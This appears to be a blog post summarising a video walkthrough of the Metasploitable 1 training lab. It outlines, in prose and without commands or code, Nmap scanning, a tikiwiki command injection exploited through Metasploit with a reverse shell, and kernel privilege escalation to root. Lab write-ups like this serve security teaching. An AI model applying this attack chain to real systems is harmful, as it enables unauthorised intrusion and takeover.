We covered the first part of Metasploitable 1 lab where we demonstrated Twiki exploitation and Linux privielge escalation through kernel exploitation.

We also covered the second part walkthrough of Metasploitable one where we demonstrated Samba shares enumeration and exploitation using smbclient & enum4linux.

We also covered the third part walkthrough of Metasploitable 1 where we exploited Tomcat Webserver using Metasploit & performed Linux privielge escalation by exploiting udev vulnerability.

OSCP Certificate Notes

The Complete Practical Web Application Penetration Testing Course

Key Steps in the Metasploitable Exploitation

  1. Initial Scan and Target Identification
    • Used Nmap to scan open ports.
    • Focused on a directory called tikiwiki discovered during scanning.
    • Identified an outdated version of Apache, providing an opportunity for exploitation.
  2. Identifying Vulnerabilities
    • Found a command injection vulnerability in the tikiwiki directory.
    • Loaded Metasploit Framework (msfconsole) to utilize an exploit for remote command execution.
  3. Using the Exploit
    • Selected a compatible reverse TCP shell payload.
    • Highlighted the importance of matching payloads with the exploit’s module.
    • Successfully established a reverse shell session, gaining restricted www-data user access.
  4. Privilege Escalation
    • Identified the system’s Linux kernel version (2.6), vulnerable to a privilege escalation exploit.
    • Explored exploit options using Metasploit and downloaded relevant scripts to target the kernel vulnerability.
  5. Executing Privilege Escalation
    • Configured the exploit with the necessary parameters, such as the session ID and netlink PID.
    • Ran the exploit successfully, escalating privileges to root.
  6. Confirming Root Access
    • Verified root access using id command.
    • Summarized the steps and emphasized the importance of kernel vulnerabilities in achieving the objective.

Video Walkthrough | P1

Video Walkthrough | P2

Video Walkthrough | P3

The exploit relied heavily on identifying an outdated Apache version and kernel vulnerability.

Using tools like Nmap for reconnaissance and Metasploit Framework for exploitation was key to the process.

The post also demonstrated the necessity of properly configuring payloads and exploits.

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles